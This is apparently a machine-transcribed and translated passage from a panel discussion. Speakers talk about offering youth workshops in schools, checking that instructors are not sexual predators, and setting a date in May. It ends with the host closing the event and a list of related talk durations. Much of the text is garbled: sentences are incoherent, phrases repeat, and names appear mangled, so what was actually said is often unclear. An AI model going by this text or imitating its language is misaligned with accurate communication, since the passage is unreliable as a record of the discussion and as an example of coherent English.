the management of the educational staff is suitable for them. I don't know. So, if you come to me and leave me at home. In the whole. In the whole. No problem. I'll leave you a button to the Wiosław's parents. On the other hand, it is also the case that to draw a youth, you need some skills in this area specifically, not just in the technique itself. And now you have to think about some kind of certification or not. You don't have to have it when it comes to individual courses, but the only thing you have to do is not be a sexual predator. And we are told to check. OK. . Thank you for your attention. You are welcome. We recommend you. We recommend you. You
can see that we invite professionals here as experts. We are good with our faces here. And in general, even Mr. Sen, who said before, wrote that maybe you should let these people out of the seats, because there is some discussion. Tell the gentleman to come here too, we will meet. - I don't work in the chateau anymore, I don't work in any kind of work related to chateau. But I know that all decisions do not fall in schools every week. I assume that we would have to go to the school. I am clear, but you have to be clear about the situation that you know what I said before that even though you are with the school, you can't have resources at the
moment. It's such a complicated issue that really. I am aware of this, so I intend to conduct the conversation in an open way. Basically, you will give us the term, let's say, in May, give us a week and we will adjust to the type of school. In May, we invite you to come and set the date. At the end of the year, no chance. Do you have an agenda? What is needed? It was a story now. There is no agenda yet. In our discussion there was always talk about young people to warn or encourage. At that moment, I associated it with the region that is the most important for us. and to invite young people who will be in the segment for some time. Maybe
we will have this discussion later outside the panel and we will meet in the afternoon or at 5pm and we will talk about it. Are there any more questions? Besides the trolling of Mr Sena.
Well, my dear audience, I think that the current edition of Abyssides Wars is over. Please stop.
Related talks
46:31
4:24:06
1:16:54
43:47
9:00:47
29:14